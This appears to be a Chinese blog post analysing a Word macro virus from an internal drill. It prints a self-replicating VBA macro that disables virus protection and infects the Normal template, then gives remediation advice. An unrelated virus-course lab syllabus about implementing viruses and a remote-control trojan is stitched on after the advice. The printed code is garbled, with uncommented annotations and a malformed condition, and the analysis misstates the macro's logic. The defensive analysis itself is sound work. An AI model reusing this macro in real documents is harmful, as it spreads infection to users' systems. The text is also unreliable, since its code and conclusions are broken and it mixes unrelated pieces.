记一次宏病毒分析

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

01 事件背景介绍

某内部应急演练中,安全部门在终端防护软件中发现宏病毒告警,现需根据样本文件进行分析。


02 事件分析过程


对样本文件进行云沙箱病毒检测,检测结果如下:

在这里插入图片描述
在这里插入图片描述

在线云沙箱检测发现该文件属于宏病毒文件,该病毒由ThisDocument的模块组成,它使用Document_Open宏,Document_Close 宏和Document_New宏进行感染。它会感染WORD的通用模版(normal.dot)文件。


在这里插入图片描述

'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next  
   Application.DisplayStatusBar = False   不显示状态栏,防止显示宏的运行状态
   Options.VirusProtection = False   关闭病毒保护功能
   Options.SaveNormalPrompt = False   如果共用模板被修改,不显示提示窗口,直接保存
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then 判断感染标志
          .DeleteLines 1, .CountOfLines   删除目标文件的所有代码
          .InsertLines 1, MyCode   向目标文件嵌入宏代码
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName   保存文档
       End If
   End With
End Sub


根据上述代码分析,当带有该宏代码的文档被打开后,会检查模板文件是否已经受到 APMP 病毒感染。如果已经感染,则删除公用模板中的旧代码,将新的恶意代码插入模板中并保存。如果文档未被感染,则不会发生任何事情。

宏代码中对Normal.dotm通用模版文件操作记录见下图:
在这里插入图片描述
在这里插入图片描述
通过上述行为综合分析,该宏代码的核心逻辑为检查模版是否被感染,如果被感染则进行替换,无其余明显的恶意行为。


03 事件分析结果


该宏代码的核心逻辑为检查模版是否被感染,如果被感染则进行替换,无其余明显的恶意行为。


04 安全加固建议


1、处置建议:删除dotm模板文件(默认文件路径为:C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\normal.dotm)后重启Word,或重新安装Word;使用终端杀毒软件进行全盘查杀,清除感染文档;设置宏安全级别为非常高,防止除Word默认的宏以外的其他宏运行;设置取消“信任所有安全的加载项和模板”,设置完毕后打开带有宏的Word文档时,会禁用宏。

2、提高安全意识:当网上下载资源、接收到别人发送的文件时,首先应有可能存在带毒文件的防范意识。不能直接打开或执行,而应先对文件进行扫描,确认文件无问题才可使用。

有关病毒方面课程的实验内容 实验一 PE结构分析及DOS病毒感染与清除 一、实验目的 1.熟悉PE文件结构 2.掌握DOS系统下.EXE文件病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)手工或编程从user32.dll中获得MessageBoxA的函数地址; 2)查阅资料,结合第2章内容,根据PE结构编写一个小的工具软件,或者用PE Explorer、PEditor、Stud_PE等工具软件查看、分析PE文件格式。针对PE文件格式,请思考:Win32病毒感染PE文件,须对该文件作哪些修改; 3)示例病毒exe_v感染原理及其清除 实验二 Windows病毒分析与防治 一、实验目的 掌握Windows病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)编程实现Immunity病毒; 2)修复被Immunity感染的host_pe.exe 3)编程实现脚本病毒或宏病毒,参考相关章节爱虫/梅丽莎病毒;修复被上述病毒感染的系统 实验三 蠕虫/木马的分析与防治 一、实验目的 掌握蠕虫/木马感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)实现“冲击着清除者”病毒; 2)实现远程线程动态嵌入技术的木马并验证; 3)实现木马远程监视/控制; 4)修复被上述病毒感染的系统
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vista_AX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值